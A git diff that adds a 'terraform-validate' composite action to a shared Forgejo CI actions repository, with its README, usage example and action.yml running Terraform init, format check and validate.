diff --git a/README.md b/README.md index ac5d988..c0964d4 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ Shared actions for Forgejo CI/CD pipelines. | [checkout](checkout) | Action for checking out a repository | | [pnpm-build](pnpm-build) | Action for building and validating with PNPM | | [publish-static-contents](publish-static-contents) | Syncs frontend assets to S3 and invalidates a CloudFront distribution | +| [terraform-validate](terraform-validate) | Validate Terraform configuration files using the official Terraform CLI | ## Security diff --git a/terraform-validate/README.md b/terraform-validate/README.md new file mode 100644 index 0000000..9ade172 --- /dev/null +++ b/terraform-validate/README.md @@ -0,0 +1,27 @@ +# terraform-validate + +Validate Terraform configuration files using the official Terraform CLI. + +## Inputs + +| Input | Required | Default | Description | +|-------|----------|---------|-------------| +| `terraform-dir` | No | `terraform` | Directory containing `.tf` files | +| `terraform-version` | No | `~1.15` | Terraform version to use | +| `terraform-workspace` | No | `""` | Terraform workspace to use | +| `jfrog-token` | No | `""` | JFrog Artifactory token for the Terraform provider registry (`TF_TOKEN_schmalz_jfrog_io`) | + +## Usage + +```yaml +- uses: schmalz/shared-actions/.forgejo/actions/terraform-validate@v1 + with: + terraform-workspace: stage + jfrog-token: ${{ secrets.JFROG_TOKEN }} +``` + +## Notes + +- Runs `terraform init -backend=false`, `terraform fmt -check -recursive`, and `terraform validate`. +- Sets `TF_WORKSPACE` during validate if `terraform-workspace` is provided. +- Sets `TF_TOKEN_schmalz_jfrog_io` on both `init` and `validate` steps if `jfrog-token` is provided. \ No newline at end of file diff --git a/terraform-validate/action.yml b/terraform-validate/action.yml new file mode 100644 index 0000000..c2c4b32 --- /dev/null +++ b/terraform-validate/action.yml @@ -0,0 +1,52 @@ +name: Terraform Validate +description: > + Validate Terraform configuration files using the official Terraform CLI. + +inputs: + terraform-dir: + description: Directory containing .tf files + required: false + default: terraform + terraform-version: + description: Terraform version to use + required: false + default: "~1.15" + terraform-workspace: + description: Terraform workspace to use + required: false + default: "" + jfrog-token: + description: JFrog Artifactory token used for Terraform provider registry (sets TF_TOKEN_schmalz_jfrog_io) + required: false + default: "" + +runs: + using: composite + steps: + # Pinned to commit SHA instead of a tag to prevent supply chain attacks. + # hashicorp/setup-terraform v4.0.0 — https://github.com/hashicorp/setup-terraform/commits/v4.0.0/ + - name: Setup Terraform + uses: hashicorp/setup-terraform@5e8dbf3c6d9deaf4193ca7a8fb23f2ac83bb6c85 + with: + terraform_version: ${{ inputs.terraform-version }} + + - name: Terraform Init + shell: bash + env: + TF_DIR: ${{ inputs.terraform-dir }} + TF_TOKEN_schmalz_jfrog_io: ${{ inputs.jfrog-token }} + run: terraform -chdir=${{ env.TF_DIR }} init -backend=false -no-color + + - name: Terraform Format Check + shell: bash + env: + TF_DIR: ${{ inputs.terraform-dir }} + run: terraform -chdir=${{ env.TF_DIR }} fmt -check -recursive + + - name: Terraform Validate + shell: bash + env: + TF_DIR: ${{ inputs.terraform-dir }} + TF_WORKSPACE: ${{ inputs.terraform-workspace }} + TF_TOKEN_schmalz_jfrog_io: ${{ inputs.jfrog-token }} + run: terraform -chdir=${{ env.TF_DIR }} validate \ No newline at end of file